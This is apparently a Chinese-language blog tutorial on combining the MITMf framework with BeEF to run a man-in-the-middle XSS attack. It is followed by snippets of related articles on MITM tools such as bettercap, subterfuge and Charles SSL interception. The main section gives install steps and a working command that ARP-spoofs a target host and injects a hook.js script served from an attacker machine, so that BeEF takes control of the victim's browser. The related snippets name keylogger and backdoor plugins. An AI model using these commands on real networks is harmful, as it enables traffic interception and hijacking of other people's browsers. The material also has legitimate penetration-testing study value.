Mitmf中间人攻击框架与beef结合,XSS一把

本文章中所使用的方法只是未了学习教育,如果读者使用该方法用于恶意用途,造成的法律后果,读者自负;网站:https://github.com/byt3bl33d3r/MITMf
安装Mitmf:1. 在Debian下安装依赖包apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

2. 安装mitmf框架

apt-get install mitmf

注意:不过这样安装完成后 mitmf 依然无法正常使用它的一些功能。因为缺少了 twisted 的版本兼容性。我们来安装适合 mitmf 的 twisted 。如果你已经安装过,那么先卸载之前的版本。输入命令:

pip uninstall twisted  kali linux 2017.3是不需要卸载但是需要重新安装下边的内容:

并用 wget 命令进行下载。

wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2  

进行中间人XSS

1. 启动beef

cd /usr/share/beef-xss/

./beef

2. 利用mitmf进行中间人XSS攻击

mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.103 –inject –sj-url http://192.168.1.104:3000/hook.js 执行后,只要用户对任何网站进行对应访问,访问页面中就被插入js代码;接下来就可以使用beef进行对应控制;

查看网页源代码

访问  127.0.0.1:3000/ui/panel

接下来就可以使用beef神器对这个windows进行很多有意思的实验。



时间: 2024-11-05 15:59:59

Mitmf中间人攻击框架与beef结合,XSS一把的相关文章

MITMf:中间人攻击框架 -由中国寒龙整理收集

MITMf:中间人攻击框架 MITMF是一个可用于中间人攻击的框架.这个框架是基于Python的,它拥有数个插件,增加了更多的渗透测试方面的功能.一些实用的插件: jskeylogger – 这个插件可以在目标机器上注入一个 javascript 键盘记录器 JavaPwn – 在客户端利用过时的Java浏览器插件,配合使用Metasploit 安装假的Java更新 FilePwn – 这个插件使用后门工厂掩饰可执行文件,以及通过http发送zip文件 Spoof – 使用ARP欺骗,DNS欺骗

自动化中间人攻击工具subterfuge小实验

Subterfuge是一款用python写的中间人攻击框架,它集成了一个前端和收集了一些著名的可用于中间人攻击的安全工具. Subterfuge主要调用的是sslstrip,sslstrip 是08 年黑帽大会提出的工具,它能突破对SSL的嗅探会进行自动的中间人攻击来拦截通讯的HTTP 流量,然后将流量中所有出现的HTTP 链接全部替换为HTTP,并把这个过程记录下来.接下来使用替换好的 HTTP 与目标机器进行连接,并且与服务器,也就是server 端进行HTTPS ,这样就可以对目标机器与服

转:中间人攻击利用框架bettercap测试

0x00前言 上篇提到内网渗透很有趣,这次就从一款新工具说起: bettercap 0x01简介 bettercap可用来实现各种中间人攻击,模块化,便携.易扩展 0x02特点 提到中间人攻击,最知名的莫过于ettercap,而开发bettercap的目的不是为了追赶它,而是替代它 原因如下: 1.ettercap很成功,但在新时代下它已经老了 2.ettercap的过滤器复杂,使用门槛高 3.在大型网络下,主机发现功能效果很差 4.优化不够,对研究人员来说,无用的功能太多 5.扩展性不够,开发

Android 中间人攻击

0x00 Android中间人攻击的思路就是劫持局域网中被攻击机器和server间的对话.被攻击机器和server表面上工作正常,实际上已经被中间人劫持.能够从一张图来明确这个过程. 受攻击主机发送的数据,首先经过了攻击者.从server返回的数据也经过攻击者,再发送给受攻击主机. 0x01 Android开源中间人攻击样例.请參考https://github.com/ssun125/Lanmitm.我们这里主要分析这个链接中效果预览中会话劫持的原理. watermark/2/text/aHR0

Android安全之Https中间人攻击漏洞

Android安全之Https中间人攻击漏洞 Android安全 Https 攻击漏洞 应用加固 御安全 MITM 0X01 概述   HTTPS,是一种网络安全传输协议,利用SSL/TLS来对数据包进行加密,以提供对网络服务器的身份认证,保护交换数据的隐私与完整性. 中间人攻击,Man-in-the-middle attack,缩写:MITM,是指攻击者与通讯的两端分别创建独立的联系,并交换其所收到的数据,使通讯的两端认为他们正在通过一个私密的连接与对方直接对话,但事实上整个会话都被攻击者完全

使用charles实现ssl中间人攻击

一.普通抓包http.https 将手机设置代理,指向PC机 在pc机上安装charles 手机应用发起http.https请求,可以看到http明文.https加密请求(ssl通信会加密请求和响应) 二.https中间人攻击 https与服务端或者ssl证书一起工作,证书由证书中心提供,用户会认为证书是安全的.事实证明,任何人都可以创建自己的证书,可以通过以下步骤使用charles实现自签名的证书. 点击proxy->proxy settings 点击ssl标签 确保勾上Enable ssl

中间人攻击——ARP欺骗的原理、实战及防御

? 1.1 什么是网关 首先来简单解释一下什么是网关,网关工作在OSI七层模型中的传输层或者应用层,用于高层协议的不同网络之间的连接,简单地说,网关就好比是一个房间通向另一个房间的一扇门. 1.2 ARP协议是什么 ARP(Address Resolution Protocol)地址转换协议,工作在OSI模型的数据链路层,在以太网中,网络设备之间互相通信是用MAC地址而不是IP地址,ARP协议就是用来把IP地址转换为MAC地址的.而RARP和ARP相反,它是反向地址转换协议,把MAC地址转换为I

我们来一起说说HTTPS中间人攻击与证书校验

一.前言 随着安全的普及,https通信应用越发广泛,但是由于对https不熟悉导致开发人员频繁错误的使用https,例如最常见的是未校验https证书从而导致"中间人攻击",并且由于修复方案也一直是个坑,导致修复这个问题时踩各种坑,故谨以此文简单的介绍相关问题. 本文第一节主要讲述https的握手过程,第二节主要讲述常见的"https中间人攻击"场景,第三节主要介绍证书校验修复方案,各位看官可根据自己口味浏览. 二.HTTPS握手过程 首先来看下https的工作原

我们一起来聊聊中间人攻击

在聊中间人攻击之前,不了解HTTPS握手过程的同学可以查看我的前一篇HTTPS握手介绍. 一.HTTPS握手过程(请点击) 三.中间人攻击 https握手过程的证书校验环节就是为了识别证书的有效性唯一性等等,所以严格意义上来说https下不存在中间人攻击,存在中间人攻击的前提条件是没有严格的对证书进行校验,或者人为的信任伪造证书,下面一起看下几种常见的https"中间人攻击"场景. 1.证书未校验 由于客户端没有做任何的证书校验,所以此时随意一张证书都可以进行中间人攻击,可以使用bur